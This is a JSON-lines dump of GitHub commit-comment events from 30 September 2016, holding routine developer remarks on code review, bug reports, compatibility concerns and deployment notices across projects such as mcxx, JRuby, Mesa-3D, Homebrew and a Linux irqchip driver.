{"id":"4645690070","type":"CommitCommentEvent","actor":{"login":"rofirrim"},"repo":{"name":"bsc-pm/mcxx"},"payload":{"comment":{"id":19247552,"position":null,"line":null,"path":null,"commit_id":"390656bb434762a3dfe409357a4389c656c1f27f","created_at":"2016-09-30T20:31:45Z","updated_at":"2016-09-30T20:31:45Z","body":"Wow, I was unaware of this double process. Good job, though I think you are still missing a few conditions things since §12.8p32 says\r\n\r\n> when the expression in a return statement is a (possibly parenthesized) id-expression that names an object with automatic storage duration declared in the body or parameter-declaration-clause of the innermost enclosing function or lambda-expression, overload resolution to select the constructor for the copy is first performed as if the object were designated by an rvalue.\r\n\r\nSo rather than checking for lvalueness, check that the expression is a `NODECL_SYMBOL`  whose `decl_context->current_scope->kind` is `BLOCK_SCOPE` (this will include parameters as well), then the used type  for the purposes of the initialization should be `no_ref(return_expr_type)`.\r\n\r\n> If the first overload resolution fails or was not performed, or if the type of the first parameter of the selected constructor is not an rvalue reference to the object’s type (possibly cv-qualified), overload resolution is performed again, considering the object as an lvalue.\r\n\r\nOverload may succeed but you still have to check that the chosen constructor has a first parameter of rvalue type (i.e. you end choosing a normal copy constructor) then you do what C++03 used to do."}},"created_at":"2016-09-30T20:31:45Z"}
{"id":"4645690868","type":"CommitCommentEvent","actor":{"login":"sprunk"},"repo":{"name":"ZeroK-RTS/Zero-K"},"payload":{"comment":{"id":19247555,"position":5,"line":95,"path":"LuaRules/Gadgets/unit_commander_upgrade.lua","commit_id":"045c9d605441c3d08f418494e1a138f393c2d662","created_at":"2016-09-30T20:31:55Z","updated_at":"2016-09-30T20:31:55Z","body":"no"}},"created_at":"2016-09-30T20:31:55Z"}
{"id":"4645690875","type":"CommitCommentEvent","actor":{"login":"axeldavy"},"repo":{"name":"iXit/Mesa-3D"},"payload":{"comment":{"id":19247556,"position":null,"line":null,"path":null,"commit_id":"894f59ca27f2169470f30063a720772893d5367e","created_at":"2016-09-30T20:31:55Z","updated_at":"2016-09-30T20:31:55Z","body":" beyond good and evil trace works here"}},"created_at":"2016-09-30T20:31:55Z"}
{"id":"4645691263","type":"CommitCommentEvent","actor":{"login":"kares"},"repo":{"name":"jruby/jruby"},"payload":{"comment":{"id":19247557,"position":null,"line":null,"path":null,"commit_id":"3ee8ac95e2bb28de1f0e065d91131652c24e5887","created_at":"2016-09-30T20:32:00Z","updated_at":"2016-09-30T20:32:00Z","body":"might be a breaking change for anyone using JRuby's Java (embed) APIs. maybe this should go into 9.2?\r\n... personally :green_heart: the change I am just raising backwards compatibility concerns - others might have\r\n"}},"created_at":"2016-09-30T20:32:00Z"}
{"id":"4645693487","type":"CommitCommentEvent","actor":{"login":"antauth"},"repo":{"name":"Meng72/rho_code_challenge_1"},"payload":{"comment":{"id":19247563,"position":16,"line":17,"path":"6-objects/literal.js","commit_id":"63c1c4eda30cfbcf2d4962b3a4857c5ab8e6bf11","created_at":"2016-09-30T20:32:27Z","updated_at":"2016-09-30T20:32:27Z","body":"The key word here is \"method\", remember that a method is a function on an object. So, we were looking for something like the following:\r\n\r\n```\r\nprime.print = function () {\r\n  console.log(this.address, \" \", this.city, \" \", this.state, \" \", this.zip);\r\n}\r\n```\r\nRemember that we use the `this` keyword to refer to properties within an object."}},"created_at":"2016-09-30T20:32:27Z"}
{"id":"4645693883","type":"CommitCommentEvent","actor":{"login":"Bladewood"},"repo":{"name":"endless-sky/endless-sky"},"payload":{"comment":{"id":19247564,"position":null,"line":null,"path":null,"commit_id":"4b2e025e6dc4043ea70e915b504a9bdd94659bd3","created_at":"2016-09-30T20:32:32Z","updated_at":"2016-09-30T20:32:32Z","body":"aaand I managed to get the zapper nerfed.\r\ndammit."}},"created_at":"2016-09-30T20:32:32Z"}
{"id":"4645696874","type":"CommitCommentEvent","actor":{"login":"btlogy"},"repo":{"name":"btlogy/puppet-redis"},"payload":{"comment":{"id":19247572,"position":56,"line":258,"path":"manifests/server.pp","commit_id":"2911fe400d1dfbe54a47b74f3c0c37c64bbfbb5b","created_at":"2016-09-30T20:33:11Z","updated_at":"2016-09-30T20:33:11Z","body":"Make sure permissions will allow multiple running users to write, as member of the group (which therefore should be unique for every instance sharing those folder though). "}},"created_at":"2016-09-30T20:33:11Z"}
{"id":"4645698240","type":"CommitCommentEvent","actor":{"login":"nickbabcock"},"repo":{"name":"FasterXML/jackson-core"},"payload":{"comment":{"id":19247575,"position":18,"line":407,"path":"src/main/java/com/fasterxml/jackson/core/JsonPointer.java","commit_id":"06f401cb78800734ea510293f3d83d66636d133a","created_at":"2016-09-30T20:33:28Z","updated_at":"2016-09-30T20:33:28Z","body":"I believe the `g` is a mistake 😛 "}},"created_at":"2016-09-30T20:33:28Z"}
{"id":"4645699111","type":"CommitCommentEvent","actor":{"login":"calebboyd"},"repo":{"name":"angular/angular"},"payload":{"comment":{"id":19247579,"position":99,"line":23,"path":"modules/@angular/core/src/reflection/reflection_capabilities.ts","commit_id":"b96869afd2bdd3ad8c5b7477da647af628e383aa","created_at":"2016-09-30T20:33:37Z","updated_at":"2016-09-30T20:33:37Z","body":"I think this might be one of the problems causing #7740 \r\nperhaps the factory should just return `new (Function.bind.apply(t, args))`"}},"created_at":"2016-09-30T20:33:37Z"}
{"id":"4645701255","type":"CommitCommentEvent","actor":{"login":"RandomDSdevel"},"repo":{"name":"Homebrew/homebrew-core"},"payload":{"comment":{"id":19247584,"position":null,"line":null,"path":null,"commit_id":"46be01e503df1e30dba395bffd87d2619e117748","created_at":"2016-09-30T20:34:08Z","updated_at":"2016-09-30T20:34:08Z","body":"@dwmw2:  Ugh, great.  I'm just about to push my PR to mark v0.22.1 as stable in Core for the time being, so we can discuss this more there.  I'll notify you guys both here and with '@'-mentions on the PR once I've finished submitting it.  "}},"created_at":"2016-09-30T20:34:08Z"}
{"id":"4645705510","type":"CommitCommentEvent","actor":{"login":"sjp46"},"repo":{"name":"sjp46/assignment3"},"payload":{"comment":{"id":19247586,"position":null,"line":null,"path":null,"commit_id":"4366e92ee0da28f54e742a78f0faa8001aca0bdb","created_at":"2016-09-30T20:35:01Z","updated_at":"2016-09-30T20:35:01Z","body":"4th Commit...i accidentally wrote that as the 3rd."}},"created_at":"2016-09-30T20:35:01Z"}
{"id":"4645705769","type":"CommitCommentEvent","actor":{"login":"iah1016"},"repo":{"name":"iah1016/Uusi-aika"},"payload":{"comment":{"id":19247587,"position":null,"line":null,"path":null,"commit_id":"fd756ecfeef448b873c8ddf318c12896d655c64e","created_at":"2016-09-30T20:35:04Z","updated_at":"2016-09-30T20:35:04Z","body":"Hups, aiheenmäärittelyn muotoilua oli tarkoitus kirjoittaa."}},"created_at":"2016-09-30T20:35:04Z"}
{"id":"4645709341","type":"CommitCommentEvent","actor":{"login":"ElbertoOne"},"repo":{"name":"ElbertoOne/Stockfish"},"payload":{"comment":{"id":19247593,"position":null,"line":null,"path":null,"commit_id":"29dc22241f086a81bac2d2f9b6b27d67539bda90","created_at":"2016-09-30T20:35:48Z","updated_at":"2016-09-30T20:35:48Z","body":"@Rocky640 and @snicolet thanks for the remarks. It seems the idea has potential, but needs improvement."}},"created_at":"2016-09-30T20:35:48Z"}
{"id":"4645709435","type":"CommitCommentEvent","actor":{"login":"btlogy"},"repo":{"name":"btlogy/puppet-redis"},"payload":{"comment":{"id":19247594,"position":17,"line":38,"path":"templates/etc/init.d/redhat_redis-server.erb","commit_id":"2911fe400d1dfbe54a47b74f3c0c37c64bbfbb5b","created_at":"2016-09-30T20:35:50Z","updated_at":"2016-09-30T20:35:50Z","body":"Start the daemon under the chosen user, or redis if not specified (which should always be the case via Puppet). This is just matching what's done in the rpm installation."}},"created_at":"2016-09-30T20:35:50Z"}
{"id":"4645709878","type":"CommitCommentEvent","actor":{"login":"zosinski"},"repo":{"name":"zosinski/bootcamp-task-8"},"payload":{"comment":{"id":19247596,"position":11,"line":8,"path":"js/script.js","commit_id":"27e49db62308c9c4c0733223987bec9b44777329","created_at":"2016-09-30T20:35:55Z","updated_at":"2016-09-30T20:35:55Z","body":"faktycznie, poprawiam"}},"created_at":"2016-09-30T20:35:55Z"}
{"id":"4645710127","type":"CommitCommentEvent","actor":{"login":"theocbuu"},"repo":{"name":"theocbuu/my_site"},"payload":{"comment":{"id":19247597,"position":32,"line":34,"path":"routes/home.js","commit_id":"b5cb3e1490d44b41145c3d7773a5cc6b509a2242","created_at":"2016-09-30T20:35:59Z","updated_at":"2016-09-30T20:35:59Z","body":"//this is get the URL from app.set('views', path.join(__dirname, 'views'));"}},"created_at":"2016-09-30T20:35:59Z"}
{"id":"4645710748","type":"CommitCommentEvent","actor":{"login":"zosinski"},"repo":{"name":"zosinski/bootcamp-task-8"},"payload":{"comment":{"id":19247599,"position":7,"line":4,"path":"js/script.js","commit_id":"27e49db62308c9c4c0733223987bec9b44777329","created_at":"2016-09-30T20:36:08Z","updated_at":"2016-09-30T20:36:08Z","body":"pomyłka, poprawiam"}},"created_at":"2016-09-30T20:36:08Z"}
{"id":"4645712508","type":"CommitCommentEvent","actor":{"login":"steplegionnare"},"repo":{"name":"rails/rails"},"payload":{"comment":{"id":19247601,"position":null,"line":null,"path":null,"commit_id":"4243a31336c7c8db2c2b327309fc3ec1a825bb35","created_at":"2016-09-30T20:36:28Z","updated_at":"2016-09-30T20:36:28Z","body":"Update d"}},"created_at":"2016-09-30T20:36:28Z"}
{"id":"4645712814","type":"CommitCommentEvent","actor":{"login":"RandomDSdevel"},"repo":{"name":"Homebrew/homebrew-core"},"payload":{"comment":{"id":19247602,"position":null,"line":null,"path":null,"commit_id":"46be01e503df1e30dba395bffd87d2619e117748","created_at":"2016-09-30T20:36:33Z","updated_at":"2016-09-30T20:36:33Z","body":"@dunn, @ilovezfs, @DomT4, @toonetown, @dwmw2, @MikeMcQuaid, @nmav:  [Pull request](https://github.com/Homebrew/homebrew-core/pull/5434) submitted!  "}},"created_at":"2016-09-30T20:36:33Z"}
{"id":"4645713602","type":"CommitCommentEvent","actor":{"login":"btlogy"},"repo":{"name":"btlogy/puppet-redis"},"payload":{"comment":{"id":19247603,"position":26,"line":47,"path":"templates/etc/init.d/redhat_redis-server.erb","commit_id":"2911fe400d1dfbe54a47b74f3c0c37c64bbfbb5b","created_at":"2016-09-30T20:36:44Z","updated_at":"2016-09-30T20:36:44Z","body":"Required to point at the right pid and print the name of the server instance."}},"created_at":"2016-09-30T20:36:44Z"}
{"id":"4645713779","type":"CommitCommentEvent","actor":{"login":"btlogy"},"repo":{"name":"btlogy/puppet-redis"},"payload":{"comment":{"id":19247604,"position":35,"line":62,"path":"templates/etc/init.d/redhat_redis-server.erb","commit_id":"2911fe400d1dfbe54a47b74f3c0c37c64bbfbb5b","created_at":"2016-09-30T20:36:46Z","updated_at":"2016-09-30T20:36:46Z","body":"Required to point at the right pid and print the name of the server instance."}},"created_at":"2016-09-30T20:36:46Z"}
{"id":"4645714130","type":"CommitCommentEvent","actor":{"login":"btlogy"},"repo":{"name":"btlogy/puppet-redis"},"payload":{"comment":{"id":19247605,"position":44,"line":72,"path":"templates/etc/init.d/redhat_redis-server.erb","commit_id":"2911fe400d1dfbe54a47b74f3c0c37c64bbfbb5b","created_at":"2016-09-30T20:36:52Z","updated_at":"2016-09-30T20:36:52Z","body":"Required to point at the right pid and print the name of the server instance."}},"created_at":"2016-09-30T20:36:52Z"}
{"id":"4645714907","type":"CommitCommentEvent","actor":{"login":"pantheondocs"},"repo":{"name":"pantheon-systems/documentation"},"payload":{"comment":{"id":19247607,"position":null,"line":null,"path":null,"commit_id":"c4b042561af7ba2077145c027cff58f06d5bbb1f","created_at":"2016-09-30T20:37:01Z","updated_at":"2016-09-30T20:37:01Z","body":"The following doc(s) have been deployed to the [1894image](https://1894image-static-docs.pantheonsite.io/docs) Multidev environment:\n- [docs/backups](https://1894image-static-docs.pantheonsite.io/docs/backups)\n- [docs/code](https://1894image-static-docs.pantheonsite.io/docs/code)\n- [docs/guides/collaborative-development](https://1894image-static-docs.pantheonsite.io/docs/guides/collaborative-development)\n- [docs/create-backups](https://1894image-static-docs.pantheonsite.io/docs/create-backups)\n- [docs/create-sites](https://1894image-static-docs.pantheonsite.io/docs/create-sites)\n- [docs/custom-distribution-updates](https://1894image-static-docs.pantheonsite.io/docs/custom-distribution-updates)\n- [docs/database-workflow](https://1894image-static-docs.pantheonsite.io/docs/database-workflow)\n- [docs/deploys](https://1894image-static-docs.pantheonsite.io/docs/deploys)\n- [docs/drupal-launch-check](https://1894image-static-docs.pantheonsite.io/docs/drupal-launch-check)\n- [docs/drush](https://1894image-static-docs.pantheonsite.io/docs/drush)\n- [docs/filesystem-faq](https://1894image-static-docs.pantheonsite.io/docs/filesystem-faq)\n- [docs/git](https://1894image-static-docs.pantheonsite.io/docs/git)\n- [docs/launch-wordpress](https://1894image-static-docs.pantheonsite.io/docs/launch-wordpress)\n- [docs/local-development](https://1894image-static-docs.pantheonsite.io/docs/local-development)\n- [docs/lock-environment](https://1894image-static-docs.pantheonsite.io/docs/lock-environment)\n- [docs/machine-tokens](https://1894image-static-docs.pantheonsite.io/docs/machine-tokens)\n- [docs/managing-edu-plus](https://1894image-static-docs.pantheonsite.io/docs/managing-edu-plus)\n- [docs/migrate-from-wpengine](https://1894image-static-docs.pantheonsite.io/docs/migrate-from-wpengine)\n- [docs/migrate-wordpress](https://1894image-static-docs.pantheonsite.io/docs/migrate-wordpress)\n- [docs/mysql-access](https://1894image-static-docs.pantheonsite.io/docs/mysql-access)\n- [docs/organizations](https://1894image-static-docs.pantheonsite.io/docs/organizations)\n- [docs/pantheon-workflow](https://1894image-static-docs.pantheonsite.io/docs/pantheon-workflow)\n- [docs/priority-enterprise-support](https://1894image-static-docs.pantheonsite.io/docs/priority-enterprise-support)\n- [docs/guides/rerouting-outbound-email](https://1894image-static-docs.pantheonsite.io/docs/guides/rerouting-outbound-email)\n- [docs/restore-environment-backup](https://1894image-static-docs.pantheonsite.io/docs/restore-environment-backup)\n- [docs/security](https://1894image-static-docs.pantheonsite.io/docs/security)\n- [docs/select-plan](https://1894image-static-docs.pantheonsite.io/docs/select-plan)\n- [docs/settings](https://1894image-static-docs.pantheonsite.io/docs/settings)\n- [docs/sftp](https://1894image-static-docs.pantheonsite.io/docs/sftp)\n- [docs/site-owner-faq](https://1894image-static-docs.pantheonsite.io/docs/site-owner-faq)\n- [docs/site-payments](https://1894image-static-docs.pantheonsite.io/docs/site-payments)\n- [docs/sites](https://1894image-static-docs.pantheonsite.io/docs/sites)\n- [docs/ssh-keys](https://1894image-static-docs.pantheonsite.io/docs/ssh-keys)\n- [docs/ssh-tunnels](https://1894image-static-docs.pantheonsite.io/docs/ssh-tunnels)\n- [docs/team-management](https://1894image-static-docs.pantheonsite.io/docs/team-management)\n- [docs/guides/terminus-drupal-site-management](https://1894image-static-docs.pantheonsite.io/docs/guides/terminus-drupal-site-management)\n- [docs/update-payment-method](https://1894image-static-docs.pantheonsite.io/docs/update-payment-method)\n- [docs/user-dashboard](https://1894image-static-docs.pantheonsite.io/docs/user-dashboard)\n- [docs/wordpress-broken-links](https://1894image-static-docs.pantheonsite.io/docs/wordpress-broken-links)\n- [docs/guides/wordpress-commandline](https://1894image-static-docs.pantheonsite.io/docs/guides/wordpress-commandline)\n- [docs/wordpress-launch-check](https://1894image-static-docs.pantheonsite.io/docs/wordpress-launch-check)\n"}},"created_at":"2016-09-30T20:37:01Z"}
{"id":"4645720311","type":"CommitCommentEvent","actor":{"login":"axeldavy"},"repo":{"name":"iXit/Mesa-3D"},"payload":{"comment":{"id":19247615,"position":null,"line":null,"path":null,"commit_id":"894f59ca27f2169470f30063a720772893d5367e","created_at":"2016-09-30T20:38:07Z","updated_at":"2016-09-30T20:38:07Z","body":"Arma2 works here (except in the past antialiasing was working better, what happened ? It forces low antialiasing now)"}},"created_at":"2016-09-30T20:38:07Z"}
{"id":"4645720746","type":"CommitCommentEvent","actor":{"login":"owenson"},"repo":{"name":"olucurious/PyFCM"},"payload":{"comment":{"id":19247617,"position":null,"line":null,"path":null,"commit_id":"39373be8a198120e26e128054ec4ec58846e0988","created_at":"2016-09-30T20:38:12Z","updated_at":"2016-09-30T20:38:12Z","body":"this commit has the effect that data_message must be specified, whereas previously it was optional.  It broke my code hence bringing me here."}},"created_at":"2016-09-30T20:38:12Z"}
{"id":"4645720906","type":"CommitCommentEvent","actor":{"login":"ndushay"},"repo":{"name":"sul-dlss/stacks"},"payload":{"comment":{"id":19247619,"position":null,"line":null,"path":null,"commit_id":"04635861df9c3319e729e7f81770d800352699da","created_at":"2016-09-30T20:38:13Z","updated_at":"2016-09-30T20:38:13Z","body":"yes!   I didn’t realize this was an option.  :-)\r\n\r\nOn Sep 30, 2016, at 12:15 PM, Chris Beer <notifications@github.com<mailto:notifications@github.com>> wrote:\r\n\r\n\r\ncap deploy production --hosts=sul-stacks-prod-c.stanford.edu<http://sul-stacks-prod-c.stanford.edu> might be useful?\r\n\r\n—\r\nYou are receiving this because you authored the thread.\r\nReply to this email directly, view it on GitHub<https://github.com/sul-dlss/stacks/commit/04635861df9c3319e729e7f81770d800352699da#commitcomment-19246512>, or mute the thread<https://github.com/notifications/unsubscribe-auth/AAF6B5dE_ISyjPhKvk4O-2eT3rDEncuKks5qvV_rgaJpZM4KLa56>.\r\n\r\n"}},"created_at":"2016-09-30T20:38:13Z"}
{"id":"4645722252","type":"CommitCommentEvent","actor":{"login":"Huevos"},"repo":{"name":"openmips/stbgui"},"payload":{"comment":{"id":19247622,"position":null,"line":null,"path":null,"commit_id":"6cfcc0fb119d11844bd38e86b36f2c16cc64c755","created_at":"2016-09-30T20:38:31Z","updated_at":"2016-09-30T20:38:31Z","body":"dvb_type = eDVBResourceManager.getInstance().getFrontendDeliverySystem(self.frontend_id)\r\n\r\nThanks Athoik.\r\n\r\nfrontend_id should be a local variable, not self."}},"created_at":"2016-09-30T20:38:31Z"}
{"id":"4645724231","type":"CommitCommentEvent","actor":{"login":"owenson"},"repo":{"name":"olucurious/PyFCM"},"payload":{"comment":{"id":19247624,"position":null,"line":null,"path":null,"commit_id":"8781696021ad124bf578642156dc70baa849f2b3","created_at":"2016-09-30T20:38:55Z","updated_at":"2016-09-30T20:38:55Z","body":"again the effect is TTL must be specified whereas it was an optional param"}},"created_at":"2016-09-30T20:38:55Z"}
{"id":"4645726025","type":"CommitCommentEvent","actor":{"login":"jeromebrunet"},"repo":{"name":"jeromebrunet/linux"},"payload":{"comment":{"id":19247630,"position":379,"line":379,"path":"drivers/irqchip/irq-meson-gpio.c","commit_id":"0ded35dff70abf1f0344c4a2c34163c60ab24a44","created_at":"2016-09-30T20:39:19Z","updated_at":"2016-09-30T20:39:19Z","body":"actually, there was a reason for this. kcalloc also initialize the allocated region to 0. This is something I wanted in the case of `pirqs`. memset to 0 for `map` is useless since I completely initialize this array just after that, hence the use of kmalloc_array which does not initialize the allocated memory\r\n\r\nBut I agree, It does not look very nice ... I will change this "}},"created_at":"2016-09-30T20:39:19Z"}
{"id":"4645730324","type":"CommitCommentEvent","actor":{"login":"jeromebrunet"},"repo":{"name":"jeromebrunet/linux"},"payload":{"comment":{"id":19247637,"position":423,"line":423,"path":"drivers/irqchip/irq-meson-gpio.c","commit_id":"0ded35dff70abf1f0344c4a2c34163c60ab24a44","created_at":"2016-09-30T20:40:14Z","updated_at":"2016-09-30T20:40:14Z","body":"Indeed, I wanted to have something since I using it a lot ... probably went a bit too far ..."}},"created_at":"2016-09-30T20:40:14Z"}
{"id":"4645733819","type":"CommitCommentEvent","actor":{"login":"jafdy"},"repo":{"name":"endless-sky/endless-sky"},"payload":{"comment":{"id":19247643,"position":null,"line":null,"path":null,"commit_id":"4b2e025e6dc4043ea70e915b504a9bdd94659bd3","created_at":"2016-09-30T20:40:58Z","updated_at":"2016-09-30T20:40:58Z","body":"If anything you got the zapper buffed. Remember it's hitting every frame rather than every other frame."}},"created_at":"2016-09-30T20:40:58Z"}
{"id":"4645736318","type":"CommitCommentEvent","actor":{"login":"LeonanCarvalho"},"repo":{"name":"telefonicaid/orchestrator"},"payload":{"comment":{"id":19247648,"position":null,"line":null,"path":null,"commit_id":"b2dc5a11f66c2a4ffa310713087fec077402903e","created_at":"2016-09-30T20:41:28Z","updated_at":"2016-09-30T20:41:28Z","body":"Just pay atenttion, this is official port used by [memcached](https://en.wikipedia.org/wiki/Memcached#Software_architecture)."}},"created_at":"2016-09-30T20:41:28Z"}
{"id":"4645736361","type":"CommitCommentEvent","actor":{"login":"jeromebrunet"},"repo":{"name":"jeromebrunet/linux"},"payload":{"comment":{"id":19247649,"position":227,"line":227,"path":"drivers/irqchip/irq-meson-gpio.c","commit_id":"0ded35dff70abf1f0344c4a2c34163c60ab24a44","created_at":"2016-09-30T20:41:28Z","updated_at":"2016-09-30T20:41:28Z","body":"I was also thinking about putting the 'hack' in separate patch ... I will do that"}},"created_at":"2016-09-30T20:41:28Z"}
{"id":"4645740137","type":"CommitCommentEvent","actor":{"login":"jeromebrunet"},"repo":{"name":"jeromebrunet/linux"},"payload":{"comment":{"id":19247655,"position":160,"line":160,"path":"drivers/irqchip/irq-meson-gpio.c","commit_id":"0ded35dff70abf1f0344c4a2c34163c60ab24a44","created_at":"2016-09-30T20:42:16Z","updated_at":"2016-09-30T20:42:16Z","body":"Nice, I was not aware of this `pr_fmt`. Thx"}},"created_at":"2016-09-30T20:42:16Z"}
{"id":"4645740856","type":"CommitCommentEvent","actor":{"login":"macool"},"repo":{"name":"noggalito/porttare-backend"},"payload":{"comment":{"id":19247656,"position":36,"line":65,"path":"spec/requests/api/providers/dispatchers/create_spec.rb","commit_id":"76822ec889ca5d02e767a3de4745ec96064e3bc7","created_at":"2016-09-30T20:42:25Z","updated_at":"2016-09-30T20:42:25Z","body":"hay que cambiar este nombre de variable. :facepalm:"}},"created_at":"2016-09-30T20:42:25Z"}
{"id":"4645745520","type":"CommitCommentEvent","actor":{"login":"jfttierney"},"repo":{"name":"jfttierney/hello-world"},"payload":{"comment":{"id":19247662,"position":null,"line":null,"path":null,"commit_id":"b9001e52cd96ad9fcb8462e875b8f1d446ecd8e9","created_at":"2016-09-30T20:43:21Z","updated_at":"2016-09-30T20:43:21Z","body":"Trying to learn this stuff"}},"created_at":"2016-09-30T20:43:21Z"}
{"id":"4645750743","type":"CommitCommentEvent","actor":{"login":"jfttierney"},"repo":{"name":"jfttierney/hello-world"},"payload":{"comment":{"id":19247670,"position":null,"line":null,"path":null,"commit_id":"b9001e52cd96ad9fcb8462e875b8f1d446ecd8e9","created_at":"2016-09-30T20:44:29Z","updated_at":"2016-09-30T20:44:29Z","body":"Secnd cmment"}},"created_at":"2016-09-30T20:44:29Z"}
{"id":"4645752805","type":"CommitCommentEvent","actor":{"login":"jfttierney"},"repo":{"name":"jfttierney/hello-world"},"payload":{"comment":{"id":19247676,"position":null,"line":null,"path":null,"commit_id":"b9001e52cd96ad9fcb8462e875b8f1d446ecd8e9","created_at":"2016-09-30T20:44:55Z","updated_at":"2016-09-30T20:44:55Z","body":"fixed it"}},"created_at":"2016-09-30T20:44:55Z"}
{"id":"4645755264","type":"CommitCommentEvent","actor":{"login":"axeldavy"},"repo":{"name":"iXit/Mesa-3D"},"payload":{"comment":{"id":19247681,"position":23,"line":463,"path":"src/gallium/state_trackers/nine/nine_ff.c","commit_id":"dfa49cb947b1da0281c39e31616706ffcabb9eee","created_at":"2016-09-30T20:45:26Z","updated_at":"2016-09-30T20:45:26Z","body":"no actually, after second though, I don't think it is a good idea. We may add constants and forgive to fix there (if we replace by NINE_FF_NUM_VS_CONST)."}},"created_at":"2016-09-30T20:45:26Z"}
{"id":"4645757173","type":"CommitCommentEvent","actor":{"login":"miraeleo"},"repo":{"name":"ArtezGDA/Pioneers"},"payload":{"comment":{"id":19247686,"position":null,"line":null,"path":null,"commit_id":"f9f9fde031ca3ca3f00f9932791ae97d06516b49","created_at":"2016-09-30T20:45:49Z","updated_at":"2016-09-30T20:45:49Z","body":"[Pamina Reisinger] (Students/PaminaReisinger/README.md)"}},"created_at":"2016-09-30T20:45:49Z"}
{"id":"4645760724","type":"CommitCommentEvent","actor":{"login":"jeromebrunet"},"repo":{"name":"jeromebrunet/linux"},"payload":{"comment":{"id":19247695,"position":109,"line":109,"path":"drivers/irqchip/irq-meson-gpio.c","commit_id":"0ded35dff70abf1f0344c4a2c34163c60ab24a44","created_at":"2016-09-30T20:46:33Z","updated_at":"2016-09-30T20:46:33Z","body":"I would prefer not to exclude meson8 from the patch serie.\r\nIf I do, I will have to fill the pinctrl data array of the meson8 with a lot `-1` which would be very ugly\r\nAlso In the previous patch from ccaione, there was the meson8 so I would prefer no to drop it\r\n\r\nMaybe I could ask Victor to confirm the few data I need ?"}},"created_at":"2016-09-30T20:46:33Z"}
{"id":"4645760841","type":"CommitCommentEvent","actor":{"login":"axeldavy"},"repo":{"name":"iXit/Mesa-3D"},"payload":{"comment":{"id":19247696,"position":27,"line":2913,"path":"src/gallium/state_trackers/nine/device9.c","commit_id":"401b7880e69de0e0b7666a5a9b12c66bdda12785","created_at":"2016-09-30T20:46:34Z","updated_at":"2016-09-30T20:46:34Z","body":"would it be easy for you to check ?"}},"created_at":"2016-09-30T20:46:34Z"}
{"id":"4645763210","type":"CommitCommentEvent","actor":{"login":"panpawn"},"repo":{"name":"Zarel/Pokemon-Showdown"},"payload":{"comment":{"id":19247703,"position":15,"line":495,"path":"command-parser.js","commit_id":"e8d7bd1c231b423bdba7e368f2a2a814ce196459","created_at":"2016-09-30T20:47:06Z","updated_at":"2016-09-30T20:47:06Z","body":"Should this line say:\r\n\r\nYou can't broadcast this because it was just broadcast**ed**"}},"created_at":"2016-09-30T20:47:06Z"}
{"id":"4645763473","type":"CommitCommentEvent","actor":{"login":"jacobcabantomski-ct"},"repo":{"name":"CommercialTribe/react-native-opentok"},"payload":{"comment":{"id":19247706,"position":null,"line":null,"path":null,"commit_id":"24673be757a0e642f13d550768518ebdef8f1bc9","created_at":"2016-09-30T20:47:09Z","updated_at":"2016-09-30T20:47:09Z","body":"👍 "}},"created_at":"2016-09-30T20:47:09Z"}
{"id":"4645772298","type":"CommitCommentEvent","actor":{"login":"jeromebrunet"},"repo":{"name":"jeromebrunet/linux"},"payload":{"comment":{"id":19247718,"position":52,"line":525,"path":"drivers/pinctrl/meson/pinctrl-meson.c","commit_id":"8c97e26b695f7666879f9e244a145dc01aabbf04","created_at":"2016-09-30T20:49:02Z","updated_at":"2016-09-30T20:49:02Z","body":"I meant to do this, everything was in place in `meson_gpio_to_hwirq` then I completely forgot. Thx for catching it ! "}},"created_at":"2016-09-30T20:49:02Z"}
{"id":"4645773903","type":"CommitCommentEvent","actor":{"login":"aschung212"},"repo":{"name":"jimmery/PHP-Calculator"},"payload":{"comment":{"id":19247723,"position":null,"line":null,"path":null,"commit_id":"b9378792d2f804311aef12f68a3390f3881087a6","created_at":"2016-09-30T20:49:22Z","updated_at":"2016-09-30T20:49:22Z","body":"wow! great!"}},"created_at":"2016-09-30T20:49:22Z"}
{"id":"4645774240","type":"CommitCommentEvent","actor":{"login":"Bladewood"},"repo":{"name":"endless-sky/endless-sky"},"payload":{"comment":{"id":19247724,"position":null,"line":null,"path":null,"commit_id":"4b2e025e6dc4043ea70e915b504a9bdd94659bd3","created_at":"2016-09-30T20:49:26Z","updated_at":"2016-09-30T20:49:26Z","body":"Zapper turret was nerfed tho."}},"created_at":"2016-09-30T20:49:26Z"}
{"id":"4645775223","type":"CommitCommentEvent","actor":{"login":"eregon"},"repo":{"name":"jruby/jruby"},"payload":{"comment":{"id":19247726,"position":null,"line":null,"path":null,"commit_id":"ed91cb4b4c39ec05cf96006d95460e9268a47a2b","created_at":"2016-09-30T20:49:41Z","updated_at":"2016-09-30T20:49:41Z","body":"@chrisseaton Should I just backport the fix to master?"}},"created_at":"2016-09-30T20:49:41Z"}
{"id":"4645775916","type":"CommitCommentEvent","actor":{"login":"Paul-Reed"},"repo":{"name":"emoncms/backup"},"payload":{"comment":{"id":19247727,"position":null,"line":null,"path":null,"commit_id":"3e1a92f46ebecd1df0ef671da2ef955b9af5e1d1","created_at":"2016-09-30T20:49:49Z","updated_at":"2016-09-30T20:49:49Z","body":"Would it beneficial to also add node-red's  'settings.js' and also the flows credentials file - 'flows_emonpi_cred.json' to the backup.\r\nI backup the entire directory, so any npm added nodes are also restored, but that adds approx 5MB to the archive, depending what's been added.\r\n\r\nPaul"}},"created_at":"2016-09-30T20:49:49Z"}
{"id":"4645777819","type":"CommitCommentEvent","actor":{"login":"VoR0220"},"repo":{"name":"eris-ltd/eris-abi"},"payload":{"comment":{"id":19247730,"position":166,"line":170,"path":"core/core.go","commit_id":"540864a31b5cd5e504a1ea13367fc67c59c68387","created_at":"2016-09-30T20:50:14Z","updated_at":"2016-09-30T20:50:14Z","body":"what does json.Decode do in that instance? It's for the purpose of finding an array. "}},"created_at":"2016-09-30T20:50:14Z"}
{"id":"4645780495","type":"CommitCommentEvent","actor":{"login":"aadjesus"},"repo":{"name":"aadjesus/Exemplos"},"payload":{"comment":{"id":19247735,"position":null,"line":null,"path":null,"commit_id":"15b1d7fe355cc514e56dbc1a283e2e994e8df64e","created_at":"2016-09-30T20:50:48Z","updated_at":"2016-09-30T20:50:48Z","body":"ok"}},"created_at":"2016-09-30T20:50:48Z"}
